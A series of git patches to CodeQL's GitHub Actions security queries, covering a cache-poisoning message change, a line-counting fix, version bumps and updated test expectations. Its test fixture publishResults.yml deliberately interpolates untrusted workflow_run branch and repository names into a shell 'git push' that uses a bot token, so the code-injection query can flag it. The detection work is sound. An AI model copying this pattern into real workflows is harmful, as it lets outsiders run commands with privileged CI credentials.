14 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 91bb4d3bc5a..85a0f53df1d 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -67,4 +67,5 @@ where ) and not step instanceof PoisonableStep select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 5d1ae7c3e74..ddfa951241e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index f45755adf1d..4cc8536b594 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -44,9 +44,9 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | From 58f060234a066b8aa37212cf249d2c2466f2c4bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:17:24 +0100 Subject: [PATCH 0647/1267] fix: count(text.splitAt()) does not account for all lines, use max(text.splitAt(,i)) instead --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5f33400bb96..57466225414 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -4,12 +4,16 @@ private import codeql.actions.Helper private import codeql.actions.config.Config private import codeql.actions.DataFlow +bindingset[text] +int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", i))) } + /** * Gets the length of each line in the StringValue . */ bindingset[text] -int lineLength(string text, int idx) { - exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1) +int lineLength(string text, int i) { + i in [0 .. numberOfLines(text)] and + result = text.splitAt("\n", i).length() + 1 } /** @@ -17,7 +21,7 @@ int lineLength(string text, int idx) { */ bindingset[text] int partialLineLengthSum(string text, int i) { - i in [0 .. count(text.splitAt("\n"))] and + i in [0 .. numberOfLines(text)] and result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } From fcc7efbc5cd73824835b157118b38374e2b5d0bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:19:06 +0100 Subject: [PATCH 0648/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9554a52d934..29a1796e182 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.79 +version: 0.1.80 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f6fe9791a93..a1caa702790 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.79 +version: 0.1.80 groups: [actions, queries] suites: codeql-suites extractor: javascript From 685c9e97ccf05aea3bcd2569adcfde71a18e2989 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 21:17:55 +0100 Subject: [PATCH 0649/1267] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +---- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 57466225414..1589b18efb0 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -11,10 +11,7 @@ int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", * Gets the length of each line in the StringValue . */ bindingset[text] -int lineLength(string text, int i) { - i in [0 .. numberOfLines(text)] and - result = text.splitAt("\n", i).length() + 1 -} +int lineLength(string text, int i) { result = text.splitAt("\n", i).length() + 1 } /** * Gets the sum of the length of the lines up to the given index. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29a1796e182..a33cecb6fe0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.80 +version: 0.1.81 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a1caa702790..6d1bc8634ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.80 +version: 0.1.81 groups: [actions, queries] suites: codeql-suites extractor: javascript From f76d4d67d990d5b32c46bd0878da432eec491c83 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 22:31:15 +0100 Subject: [PATCH 0650/1267] tests: update tests --- .../.github/workflows/publishResults.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++-------- .../CWE-094/CodeInjectionMedium.expected | 12 ++++++------ 3 files changed, 28 insertions(+), 14 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml index 17d9680d907..b4c2ecaec70 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -60,6 +60,20 @@ jobs: id: git-commit if: steps.search-patch.outputs.result run: | + set -x + # Set initial placeholder name/mail and read it from the patch later + git config --global user.email 'foo@bar' + git config --global user.name 'Foo Bar' + + git am version_increments.patch + + # Read the author's name+mail from the just applied patch and recommit it with both set as committer + botMail=$(git log -1 --pretty=format:'%ae') + botName=$(git log -1 --pretty=format:'%an') + git config --global user.email "${botMail}" + git config --global user.name "${botName}" + git commit --amend --no-edit + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) echo "file-list<> $GITHUB_OUTPUT echo "$fileList" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 5187e875cb7..a862c0901ca 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -623,8 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | 